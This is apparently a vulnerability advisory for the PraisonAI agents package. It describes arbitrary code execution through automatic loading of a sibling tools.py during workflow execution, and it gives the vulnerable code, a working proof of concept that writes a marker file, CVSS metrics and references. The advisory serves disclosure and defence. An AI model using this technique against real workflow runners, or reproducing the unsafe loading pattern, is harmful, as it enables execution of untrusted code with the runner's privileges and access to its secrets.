PraisonAI: Unsafe Dynamic Module Loading Leads to Arbitrary Code Execution via tools.py in AgentFlow
Description
### Summary An unsafe dynamic module loading vulnerability allows an attacker who can control a workflow file and a sibling `tools.py` to execute arbitrary Python code when the workflow is executed. ### Details The vulnerability is located in the workflow structured output resolution logic. File: src/praisonai-agents/praisonaiagents/workflows/workflows.py Method: AgentFlow._resolve_pydantic_class ```python if self.file_path: workflow_dir = Path(self.file_path).parent tools_path = workflow_dir / "tools.py" if tools_path.exists(): spec = importlib.util.spec_from_file_location("tools", tools_path) tools_module = importlib.util.module_from_spec(spec) spec.loader.exec_module(tools_module) # Arbitrary code execution ``` This code is reached during step execution when a step uses a string `output_pydantic`: ```python step_output_pydantic = getattr(step, '_output_pydantic', None) if step_output_pydantic and isinstance(step_output_pydantic, str): resolved_class = self._resolve_pydantic_class(step_output_pydantic) ``` `file_path` is set automatically by: - `WorkflowManager._load_workflow()` (used by workspace discovery) - `WorkflowManager.create_workflow()` It can also be set manually after `load_yaml()`: ```python wf = mgr.load_yaml("workflow.yaml") wf.file_path = "workflow.yaml" ``` The `exec_module()` call has no sandboxing and ignores the `PRAISONAI_ALLOW_*_TOOLS` environment variables used elsewhere in the project. ### PoC Create the following two files in the same directory: `/tmp/attack/attack.yaml` ```yaml name: AttackWorkflow steps: - name: generate action: "Produce structured output" output_pydantic: MaliciousModel ``` `/tmp/attack/tools.py` ```python print("[RCE] Arbitrary code executed from tools.py") import os with open("/tmp/rce_success.txt", "w") as f: f.write(f"RCE executed by PID {os.getpid()}") class MaliciousModel: @classmethod def model_json_schema(cls): return {"type": "object"} ``` Run the following Python code (adjust the path to your PraisonAI source): ```python import sys sys.path.insert(0, "/home/user/praisonai/src/praisonai-agents") from praisonaiagents.workflows import WorkflowManager from praisonaiagents.agent.agent import Agent mgr = WorkflowManager() wf = mgr.load_yaml("/tmp/attack/attack.yaml") wf.file_path = "/tmp/attack/attack.yaml" for step in wf.steps: step.output_pydantic = "MaliciousModel" step._output_pydantic = "MaliciousModel" if not getattr(step, "agent", None): step.agent = Agent( name="researcher", role="Researcher", goal="Generate output", instructions="Return structured data" ) wf.start("trigger") ``` ### Impact Type: Execution of Untrusted Local Code via Unsafe Dynamic Module Loading. Affected users include: - Users of `WorkflowManager(workspace_path=...)`, where workflow discovery automatically sets `file_path`. - Users of `WorkflowManager.create_workflow()`. - Applications that load workflows from repositories, templates, shared workflow collections, CI/CD artifacts, or other directories that may contain untrusted files. During workflow execution, a string `output_pydantic` reference causes the framework to automatically locate, import, and execute a sibling `tools.py` file. As a result, code contained in `tools.py` executes with the privileges of the workflow runner without requiring an explicit import or user approval step. Successful exploitation results in arbitrary Python code execution within the workflow process. An attacker may be able to read local files, access secrets available to the process, modify workflow behavior, perform network operations, or execute additional system commands. This behavior also bypasses the `PRAISONAI_ALLOW_TEMPLATE_TOOLS` / `PRAISONAI_ALLOW_LOCAL_TOOLS` protections used elsewhere in the project, allowing code execution through a separate workflow-resolution path.
CVSS v3.1 base metrics
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:HHigh severity
Band computed from the CVSS base score, not the source's own label — so it means the same thing across every feed.
AV
Local
Attack Vector
AC
Low
Attack Complexity
PR
None
Privileges Required
UI
Required
User Interaction
S
Unchanged
Scope
C
High
Confidentiality
I
High
Integrity
A
High
Availability
Affected
- Vendor
- PyPI
- Product
- praisonaiagents
Versions
- pkg:pypi/praisonaiagents < 1.6.78
Stated as the source expressed them.
References
- advisoryOSV GHSA-4gfv-wg42-7jw5https://osv.dev/vulnerability/GHSA-4gfv-wg42-7jw5
- otherOSV webhttps://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4gfv-wg42-7jw5
- advisoryOSV advisoryhttps://nvd.nist.gov/vuln/detail/CVE-2026-61437
- vendorOSV packagehttps://github.com/MervinPraison/PraisonAI
- otherOSV webhttps://www.vulncheck.com/advisories/praisonai-before-remote-code-execution-via-tools-py
Related threats
same CWE or vendorCVE-2026-16916 — IBM Security Verify Access 10.0 through 10.0.9.2 and IBM Verify Identity Access 11.0 through 11.0.3 could allow a remote authenticated attacker to …
CVE-2026-16916 · 2h ago
PraisonAI: Prompt-injection defense blocks only when 3+ detector families fire simultaneously; realistic single-vector injections pass through unblocked
CVE-2026-60086 · 4h ago
PraisonAI: API deploy code generator embeds unescaped YAML fields into Python source
CVE-2026-61433 · 4h ago
PraisonAI: Call API localhost-only authentication bypass via spoofed Host header
CVE-2026-61435 · 4h ago
CVE-2026-107697 — FFmpeg before 8.1.3 contains a protection mechanism failure in the HLS demuxer that allows attackers to bypass protocol and allowed_extensions rest…
CVE-2026-107697 · 5h ago
CVE-2026-107378 — CairoSVG is an SVG converter based on Cairo, a 2D graphics library.
CVE-2026-107378 · 5h ago